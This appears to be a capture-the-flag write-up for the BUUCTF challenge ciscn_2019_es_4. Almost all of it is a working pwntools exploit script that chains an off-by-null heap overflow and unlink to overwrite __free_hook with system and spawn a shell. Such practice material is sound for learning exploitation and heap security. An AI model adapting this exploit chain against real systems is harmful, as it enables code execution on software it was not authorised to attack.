BUUCTF ciscn_2019_es_4

转角一扇门 2022-09-09 阅读 34

off-by-null + unlink

from pwn import *
# Session-wide pwntools settings: 64-bit target, verbose tube logging.
context(arch='amd64', log_level='debug')

# Local process by default; the commented line is the BUUCTF remote instance.
s = process('./ciscn_2019_es_4')
#s = remote('node4.buuoj.cn',25370)

# The libc build the challenge ships with (glibc 2.27) and the target ELF itself.
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
elf = ELF('./ciscn_2019_es_4')

def add(index, size, content):
    """Menu option 1: allocate slot *index* with *size* bytes and send *content*."""
    answers = (
        (b'4.show\n', b'1'),
        (b'index:\n', str(index)),
        (b'size:\n', str(size)),
    )
    for prompt, answer in answers:
        s.sendlineafter(prompt, answer)
    # Content goes out raw (sendafter, not sendlineafter): no trailing newline.
    s.sendafter(b'content:\n', content)

def delete(index):
    """Menu option 2: free slot *index*."""
    answers = (
        (b'4.show\n', b'2'),
        (b'index:\n', str(index)),
    )
    for prompt, answer in answers:
        s.sendlineafter(prompt, answer)

def edit(index, content):
    """Menu option 3: overwrite slot *index* with *content*."""
    answers = (
        (b'4.show\n', b'3'),
        (b'index:\n', str(index)),
    )
    for prompt, answer in answers:
        s.sendlineafter(prompt, answer)
    # Content goes out raw (sendafter, not sendlineafter): no trailing newline.
    s.sendafter(b'content:\n', content)

def show(index):
    """Menu option 4: ask the program to print slot *index*; the caller reads the output."""
    answers = (
        (b'4.show\n', b'4'),
        (b'index:\n', str(index)),
    )
    for prompt, answer in answers:
        s.sendlineafter(prompt, answer)

# Fixed addresses below are specific to this binary (presumably non-PIE, given
# the 0x602xxx range) and to the glibc 2.27 build loaded above.
target = 0x6020E0 + 8 * 7   # entry 7 of a global table at 0x6020E0 — presumably the chunk-pointer table; confirm in the binary
fd = target - 0x18          # fd/bk are derived from `target` (the "unlink" step named in the title)
bk = target - 0x10

key2_addr = 0x6022B8        # NOTE(review): what this global is for is not visible in this script

# Slots 0-6: seven allocations of the same size class.
for i in range(7):
    add(i , 0xf0 , b'a') # 0-6

# Slot 7 is allocated by hand rather than via add(): the program prints a
# 'gift: ' line before asking for content, and it is parsed here as a 7-digit
# hex heap address.
s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(7))
s.sendlineafter(b'size:\n' , str(0x88))
s.recvuntil(b'gift: ')
heap_addr = int(s.recv(7),16)
success('heap_addr=>' + hex(heap_addr))
s.sendafter(b'content:\n' , b'a') # 7

add(8 , 0xf0 , b'a') # 8
add(9 , 0x80 , b'a') # 9
add(10 , 0x80 , b'a') # 10
add(11 , 0x80 , b'/bin/sh\x00') # 11  -- freed last; its content is what the final free() sees

# Free slots 0-6 (same size as each other; looks like tcache filling on 2.27 — verify).
for i in range(7):
    delete(i)


# Fake chunk written into slot 7: zero prev_size, size 0x81, then the fd/bk
# computed above, padding, and finally the size field of the following chunk.
# 0x10 + 0x10 + 0x60 + 0x8 = 0x88 bytes, exactly the size requested for slot 7.
payload = p64(0) + p64(0x81)
payload+= p64(fd) + p64(bk)
payload+= b'\x00'*0x60
payload+= p64(0x80)

edit(7 , payload)
delete(8)   # freeing slot 8 is what triggers the consolidation/unlink

# After the unlink, writing through slot 7 presumably lands inside the pointer
# table itself: two heap pointers, free@GOT, and 0x602100 (== 0x6020E0 + 8*4).
payload = p64(heap_addr + 0x190) + p64(heap_addr + 0x190)
payload+= p64(elf.got['free']) + p64(0x602100)

edit(7 , payload)

delete(4)
delete(5)

# NOTE(review): the purpose of writing key2_addr into slots 4/5 and 0xfffffff
# into slot 8 is not visible from this script alone.
add(4 , 0x80 , p64(key2_addr)) # 4
add(5 , 0x80 , p64(key2_addr)) # 5
add(8 , 0x80 , p64(0xfffffff)) # 8

# Slot 6 appears to point at free@GOT after the edit above, so showing it leaks
# a libc pointer: take the 6 bytes ending in 0x7f, zero-extend to 8, subtract
# free's offset.
show(6)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['free']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']


# Slot 7 was set to 0x602100 (table entry 4), so this edit makes slot 4 point
# at __free_hook; the next edit writes system there, and freeing slot 11
# ("/bin/sh") invokes it.
edit(7 , p64(__free_hook))
edit(4 , p64(system_addr))
delete(11)

#gdb.attach(s)

 


作者:{狒猩橙}


